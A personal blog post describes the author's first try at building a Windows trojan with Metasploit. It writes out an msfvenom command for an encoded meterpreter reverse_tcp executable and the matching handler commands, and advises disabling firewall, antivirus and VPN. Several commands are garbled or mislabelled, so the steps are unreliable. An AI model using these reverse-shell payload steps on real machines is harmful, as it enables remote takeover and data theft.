Using Linux (Linux Lite OS) and Metasploit, I've successfully created my first Trojan.exe file executable for Windows 10 OS. In order to get my Trojan.exe on a Windows device from my Linux laptop it had to be moved via USB. In addition, Windows firewall had to be shut off with real time detection disabled. There is a lot of excitement in learning and practicing "red-team/blue team" style penetration testing. Remember, never hack someone who is unaware of the exploit or attack. Digital data theft is considered as a crime throughout most countries in the world and there are some real world consequences.
Using the Linux root terminal Metasploit was easily installed. Instructions for installation here You may need to have pip installed beforehand.
Pip is installed with the terminal as follows:
apt sudo install python3-pip
Once Metasploit is open (using msfconsole on the root terminal) there will be easy commands that will be available to you for infiltration exploit purposes. Most organizations will perform strategies conceiving cyber security threats in order to build defenses for potential future events.
The command used in Metasploit to create my Trojan.exe is as follows. Note: You can set the LPORT to whatever four digits you'd like. The LHOST is your target I.P. address, my command is just an example; therefore not a real IP address:
msfvenom -p windows/meterpreter/reverse_tcp LHOST = 192.168.0.0 LPORT = 5555 - exe x86/shikata_ga_nai -i 10 > trojan.exe
All of the sudden my trojan.exe file was born. Waiting for me in the user folder was this beauty that is about to open a world of doors for good advancements in my studies. Moving it to the USB stick was a breeze. Now is when the fun begins.
In this case the Trojan we newly formulated would be pulled from the library of items instead of built from the ground up. In most scenarios, anti-virus software or firewalls could detect or deter this level of threat. This is why turning off Windows safety features is important when running this test. If you are following along, turn off any VPNs currently running for the time being. From the USB move the Trojan virus into your designated folder. A few minutes of research taught me to configurate my router as well if I'm not on static connection.
Return to your msfconsole on the linux terminal and input these commands one by one:
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.0
set LPORT 5555
If you've done everything right then you should be in the targeted device. However, this is where my path halted. My failure probably stemmed from not configuring my router properly or simply not using a static line connection. I don't want to test these theories yet as I'm not the only one in the household using internet or WIFI. It would be unfair to them if the router was shut off for a long period of time. There will be a time when my adventure is finally finished.
I've tried several attempts with slight alterations but errors are the same:
Handler failed to bind to 192.168.0.0:5555- -
Handler failed to bind to 0.0.0.0:5555- -
Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable (0.0.0.0:5555).
Exploit complete, but no session was created
Keep in mind 192.168.0.0 is a pseudo IP address for this Hive post.
My instructions came from handy YouTube video: Create Your First Trojan by Red Python 'Cyber Security' It appears that he is using a virtual windows machine within the Linux environment. Maybe I could try using a virtual windows machine later on.
At least the project was kick started. I'm still determined to get my Trojan.exe file working so that data can just flow in my lap. It's exciting to learn about Linux root commands or different terminal software. My next attempt will be to use a static only connection line. In doing so, we'll have to remove the WIFI router from the topology temporally. If this doesn't work, then creating a virtual windows machine may help. Other steps could include resetting the LPORT while static connection is enabled. There are so many notes to be taken yet so little time!
Donations Are Very Much Appreciated
And Used For Current Or Future Projects!
Raven Coin: REQDGe947f6Rca1V9sjy8vpEzPGDbEMsMH